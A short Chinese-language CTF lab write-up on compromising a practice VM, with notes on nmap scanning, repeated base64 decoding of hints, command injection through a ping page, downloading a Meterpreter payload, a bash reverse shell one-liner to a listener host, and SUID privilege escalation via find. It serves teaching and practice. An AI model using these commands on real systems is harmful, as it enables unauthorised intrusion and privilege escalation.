目录
经验 & 总结
- CTF这种东西还是有一些脑洞和约定俗成的东西:
- 比如多次编码
- 比如cmd参数传入执行的命令
步骤流水
端口信息搜集
nmap -A 192.168.1.109,只开放了80和22端口。
访问80端口
探查
robots.txt,解码之后为lol try harder bro
常用路径探测
对index.html页面的注释多次base64解码后发现提示
访问页面:
思路:利用ping command执行系统命令,下载木马,然后提权
经提示发现命令执行接口
确认存在wget,同时命令中可以输入空格
尝试通过wget下载msf的
linux/x64/meterpreter/reverse_tcp,但是无法添加执行权限
尝试通过bash脚本执行回连操作
bash -i >& /dev/tcp/192.168.1.108/4444 0>&1
为之前上传的meterpreter程序添加执行权限,得到meterpreter会话
尝试访问root目录,被拒绝
查找有suid权限的程序:
利用
find获得高权限shell:find . -exec /bin/bash -p \; -quit
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。
